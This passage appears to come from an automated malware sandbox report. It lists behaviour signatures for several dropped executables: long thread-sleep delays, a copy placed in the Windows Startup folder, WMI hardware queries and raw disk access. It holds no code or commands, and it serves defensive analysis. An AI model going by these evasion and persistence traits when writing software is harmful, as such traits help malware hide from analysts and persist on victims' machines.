                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 180Thread sleep count: 68 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 180Thread sleep time: -136068s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 428Thread sleep count: 68 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 428Thread sleep time: -136068s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3288Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599890s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599781s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599672s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599562s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599453s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599343s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599234s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -599125s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598992s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598797s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598625s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598515s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598406s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598290s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598161s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -598011s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597906s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597791s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597673s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597531s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597422s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597310s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597196s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -597078s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596967s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596858s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596745s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596636s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596500s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -596078s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595875s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595731s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595607s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595468s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595299s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595156s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -595030s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594920s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594812s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594702s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594593s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594484s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594375s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594265s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594156s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -594047s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593936s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593778s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593625s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593323s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593202s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe TID: 7840Thread sleep time: -593094s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep count: 37 > 30
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -34126476536362649s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -60000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -59875s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7400Thread sleep count: 5081 > 30
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7400Thread sleep count: 4734 > 30
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -59766s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -59641s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -59516s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -59406s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -59290s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -59141s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -58839s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -58733s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -58625s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -58516s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -58406s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -58297s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -58188s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -58063s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -57938s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -57813s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -57676s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -57547s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -57437s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -57328s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -57218s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -57061s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -56952s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -56843s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -56734s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -56625s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -56470s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -56175s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -56047s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -55924s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -55797s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -55679s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -55538s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -55438s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -55272s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -55155s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -55045s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -54934s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -54826s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -54716s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -54609s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -54485s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -54360s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -54235s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -54110s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -53899s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -53656s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -53437s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -53327s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 7328Thread sleep time: -53218s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 5724Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 4948Thread sleep time: -38019s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 344Thread sleep time: -58029s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 7352Thread sleep time: -40000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 5260Thread sleep time: -240000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 3804Thread sleep time: -70035s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 2504Thread sleep time: -54027s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 2896Thread sleep time: -66033s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 1772Thread sleep time: -68034s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe TID: 2032Thread sleep time: -66033s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 5597 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 4178 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6948Thread sleep count: 31 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6948Thread sleep time: -28592453314249787s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6864Thread sleep count: 3538 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6864Thread sleep count: 4893 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe TID: 6948Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe TID: 3964Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe TID: 2912Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe TID: 6164Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe TID: 7976Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599890Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599781Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599672Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599562Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599453Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599343Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599234Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 599125Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598992Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598797Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598625Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598515Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598406Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598290Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598161Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 598011Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597906Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597791Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597673Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597531Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597422Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597310Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597196Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 597078Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596967Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596858Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596745Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596636Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596500Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 596078Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595731Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595607Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595468Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595299Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595156Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 595030Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594920Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594812Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594702Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594593Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594484Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594375Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594265Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594156Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 594047Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593936Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593778Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593625Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593323Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593202Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeThread delayed: delay time: 593094Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 60000
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 59875
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 59766
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 59641
